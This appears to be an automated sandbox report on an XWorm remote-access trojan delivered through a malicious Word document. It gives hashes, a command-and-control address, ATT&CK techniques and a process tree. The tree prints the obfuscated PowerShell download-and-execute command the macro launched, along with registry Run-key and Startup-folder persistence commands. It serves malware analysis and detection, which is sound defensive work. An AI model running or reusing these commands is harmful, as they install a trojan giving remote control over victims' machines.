xworm | 62b96f7ff4146f33146f2c134e2bfe2ad3bc2df63f1276c9eb6ad1af5952940e

Analysis

max time kernel
147s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2024 02:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

62b96f7ff4146f33146f2c134e2bfe2ad3bc2df63f1276c9eb6ad1af5952940e.doc
Size

797KB
MD5

917e800806d60717238c5b767070af1a
SHA1

2fd273a4f5a39691e4f256eebf4c0ec705a0d298
SHA256

62b96f7ff4146f33146f2c134e2bfe2ad3bc2df63f1276c9eb6ad1af5952940e
SHA512

ebc6c8f811383faad6f159b65e3db598173e5fba6fb6e0167dbdf85e148ddbcd25400e8c1395e7388ea897ae7cb646832c88400a7eb461bb65efd7d098d4afc4
SSDEEP

24576:/KOGjn4lUrN4vaxrB1qep1wuJ7NYtQV7dJXWlLPx:3q4m4Sxrzp1TJ7j7vXW

Score

10^/10

xworm discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

185.244.29.113:5563

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/432-227-0x0000000000400000-0x0000000000418000-memory.dmp	family_xworm

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	1216	2880	cMD.exe	82

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
24	3556	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3556	powershell.exe
3556	powershell.exe

Downloads MZ/PE file

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	InstallUtil.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	InstallUtil.exe

Executes dropped EXE 2 IoCs

pid	Process
3960	admini.exe
4312	xwor.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\admin = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\xwor.exe"	reg.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4312 set thread context of 432	4312	xwor.exe	112

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	admini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xwor.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	InstallUtil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1624	cmd.exe
4292	PING.EXE
4168	cmd.exe
4436	PING.EXE
1136	PING.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
4436	PING.EXE
1136	PING.EXE
4292	PING.EXE

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
2880	WINWORD.EXE
2880	WINWORD.EXE
432	InstallUtil.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
3556	powershell.exe
3556	powershell.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
3960	admini.exe
4312	xwor.exe
4312	xwor.exe
4312	xwor.exe
4312	xwor.exe
4312	xwor.exe
432	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3556	powershell.exe
Token: SeDebugPrivilege	3960	admini.exe
Token: SeDebugPrivilege	4312	xwor.exe
Token: SeDebugPrivilege	432	InstallUtil.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
2880	WINWORD.EXE
2880	WINWORD.EXE
2880	WINWORD.EXE
2880	WINWORD.EXE
2880	WINWORD.EXE
2880	WINWORD.EXE
2880	WINWORD.EXE
432	InstallUtil.exe

Suspicious use of WriteProcessMemory 44 IoCs

description	pid	Process	procid_target
PID 2880 wrote to memory of 1216	2880	WINWORD.EXE	86
PID 2880 wrote to memory of 1216	2880	WINWORD.EXE	86
PID 1216 wrote to memory of 3556	1216	cMD.exe	88
PID 1216 wrote to memory of 3556	1216	cMD.exe	88
PID 3556 wrote to memory of 3960	3556	powershell.exe	99
PID 3556 wrote to memory of 3960	3556	powershell.exe	99
PID 3556 wrote to memory of 3960	3556	powershell.exe	99
PID 3960 wrote to memory of 1624	3960	admini.exe	100
PID 3960 wrote to memory of 1624	3960	admini.exe	100
PID 3960 wrote to memory of 1624	3960	admini.exe	100
PID 1624 wrote to memory of 4292	1624	cmd.exe	102
PID 1624 wrote to memory of 4292	1624	cmd.exe	102
PID 1624 wrote to memory of 4292	1624	cmd.exe	102
PID 3960 wrote to memory of 4168	3960	admini.exe	103
PID 3960 wrote to memory of 4168	3960	admini.exe	103
PID 3960 wrote to memory of 4168	3960	admini.exe	103
PID 4168 wrote to memory of 4436	4168	cmd.exe	105
PID 4168 wrote to memory of 4436	4168	cmd.exe	105
PID 4168 wrote to memory of 4436	4168	cmd.exe	105
PID 1624 wrote to memory of 3904	1624	cmd.exe	106
PID 1624 wrote to memory of 3904	1624	cmd.exe	106
PID 1624 wrote to memory of 3904	1624	cmd.exe	106
PID 4168 wrote to memory of 1136	4168	cmd.exe	107
PID 4168 wrote to memory of 1136	4168	cmd.exe	107
PID 4168 wrote to memory of 1136	4168	cmd.exe	107
PID 4168 wrote to memory of 4312	4168	cmd.exe	110
PID 4168 wrote to memory of 4312	4168	cmd.exe	110
PID 4168 wrote to memory of 4312	4168	cmd.exe	110
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 1608	4312	xwor.exe	111
PID 4312 wrote to memory of 432	4312	xwor.exe	112
PID 4312 wrote to memory of 432	4312	xwor.exe	112
PID 4312 wrote to memory of 432	4312	xwor.exe	112
PID 4312 wrote to memory of 432	4312	xwor.exe	112
PID 4312 wrote to memory of 432	4312	xwor.exe	112
PID 4312 wrote to memory of 432	4312	xwor.exe	112
PID 4312 wrote to memory of 432	4312	xwor.exe	112
PID 4312 wrote to memory of 432	4312	xwor.exe	112

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\62b96f7ff4146f33146f2c134e2bfe2ad3bc2df63f1276c9eb6ad1af5952940e.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2880
- C:\Windows\SYSTEM32\cMD.exe
  cMD /C POWerSheLL.EXE -ex bYPasS -NOp -w HIdden invoKe-WebreqUeSt -uRI 'https://alexanu.com/xwcry.exe' -OutFiLE '%AppDaTa%\admini.exe' ; inVoKe-itEm '%apPDAtA%\admini.exe'
  2⤵
  - Process spawned unexpected child process
  - Suspicious use of WriteProcessMemory
  PID:1216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    POWerSheLL.EXE -ex bYPasS -NOp -w HIdden invoKe-WebreqUeSt -uRI 'https://alexanu.com/xwcry.exe' -OutFiLE 'C:\Users\Admin\AppData\Roaming\admini.exe' ; inVoKe-itEm 'C:\Users\Admin\AppData\Roaming\admini.exe'
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Users\Admin\AppData\Roaming\admini.exe
      "C:\Users\Admin\AppData\Roaming\admini.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3960
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 7 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "admin" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe"
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1624
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 7
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4292
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "admin" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe"
        6⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3904
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 9 > nul && copy "C:\Users\Admin\AppData\Roaming\admini.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe" && ping 127.0.0.1 -n 9 > nul && "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe"
        5⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4168
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 9
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4436
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 9
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1136
      - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xwor.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4312
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        7⤵
        
        PID:1608
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        7⤵
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCDEB44.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2afv5kil.jad.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
6e1e0f59893d1d09af6151698b4322e6

SHA1
d12bf66ba5e7658bbdf8088b10fa7dd1bd51bac0

SHA256
335f5cd002eb20fd66ee8779d257ead70028add99dfa2b6dfa4740d798cfe795

SHA512
b69bad428599a0e63edd003cebe967a240802fd0dbcb430ea915f2060eb374c1bca609aaefdb25988d897e588df8131e7b368bf9a8856e3005c18491d61156c6

Download Submit
C:\Users\Admin\AppData\Roaming\admini.exe

Filesize
569KB

MD5
bd68902a8945ae6d477a6987d6a4adae

SHA1
32fe48563a19a99bfb1bc72d5cc28cf25b84be95

SHA256
e0093e723e1a58f6a4914bb895afee80a8cce033d6534588a78ed404d69e348f

SHA512
49fc903de523c244e70adccab727bbc353a0e05aa742e713d9841848440c8d83d17170b45f965ae0625e912211fb4c89c4fb2fb0ad5452c37a761e9fa7347eba

Download Submit
memory/432-227-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download
memory/2880-11-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-3-0x00007FFE8CFD0000-0x00007FFE8CFE0000-memory.dmp

Filesize
64KB

Download
memory/2880-12-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-13-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-14-0x00007FFE8AAB0000-0x00007FFE8AAC0000-memory.dmp

Filesize
64KB

Download
memory/2880-1-0x00007FFECCFED000-0x00007FFECCFEE000-memory.dmp

Filesize
4KB

Download
memory/2880-15-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-17-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-18-0x00007FFE8AAB0000-0x00007FFE8AAC0000-memory.dmp

Filesize
64KB

Download
memory/2880-16-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-9-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-7-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-6-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-39-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-38-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-40-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-0-0x00007FFE8CFD0000-0x00007FFE8CFE0000-memory.dmp

Filesize
64KB

Download
memory/2880-4-0x00007FFE8CFD0000-0x00007FFE8CFE0000-memory.dmp

Filesize
64KB

Download
memory/2880-8-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-10-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-63-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-64-0x00007FFECCFED000-0x00007FFECCFEE000-memory.dmp

Filesize
4KB

Download
memory/2880-65-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-66-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-5-0x00007FFE8CFD0000-0x00007FFE8CFE0000-memory.dmp

Filesize
64KB

Download
memory/2880-75-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/2880-2-0x00007FFE8CFD0000-0x00007FFE8CFE0000-memory.dmp

Filesize
64KB

Download
memory/3556-51-0x0000023A21390000-0x0000023A213B2000-memory.dmp

Filesize
136KB

Download
memory/3556-90-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/3556-41-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/3556-76-0x00007FFECCF50000-0x00007FFECD145000-memory.dmp

Filesize
2.0MB

Download
memory/3960-92-0x00000000055D0000-0x000000000566C000-memory.dmp

Filesize
624KB

Download
memory/3960-94-0x0000000005740000-0x00000000057D2000-memory.dmp

Filesize
584KB

Download
memory/3960-93-0x0000000005C50000-0x00000000061F4000-memory.dmp

Filesize
5.6MB

Download
memory/3960-212-0x00000000057E0000-0x0000000005822000-memory.dmp

Filesize
264KB

Download
memory/3960-213-0x0000000005C00000-0x0000000005C0A000-memory.dmp

Filesize
40KB

Download
memory/3960-91-0x0000000000C40000-0x0000000000CD4000-memory.dmp

Filesize
592KB

Download
memory/4312-220-0x00000000002D0000-0x0000000000364000-memory.dmp

Filesize
592KB

Download
memory/4312-221-0x0000000006DB0000-0x0000000006DCA000-memory.dmp

Filesize
104KB

Download
memory/4312-222-0x00000000093D0000-0x00000000093D6000-memory.dmp

Filesize
24KB

Download